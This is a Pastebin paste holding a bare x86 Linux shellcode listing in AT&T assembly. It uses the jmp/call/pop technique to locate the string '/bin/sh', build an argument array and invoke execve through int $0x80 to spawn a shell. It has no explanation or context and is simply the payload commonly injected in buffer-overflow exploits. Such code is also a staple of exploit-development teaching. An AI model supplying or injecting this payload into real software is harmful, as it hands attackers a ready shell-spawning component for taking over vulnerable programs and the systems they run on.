Advertisement
Guest User

Untitled

a guest
May 14th, 2018
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 1 jmp ahead
  2. 2 back:
  3. 3 popl %ebx
  4. 4 movl $0x0, %eax
  5. 5 movl %ebx, 0x8(%ebx)
  6. 6 movb %al, 0x7(%ebx)
  7. 7 leal 0x8(%ebx), %ecx
  8. 8 movl %eax, 0xc(%ebx)
  9. 9 movl %eax, %edx
  10. 10 movb $0xb, %al
  11. 11 int $0x80
  12. 12 ahead:
  13. 13 call back
  14. 14 .string \"/bin/sh\"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement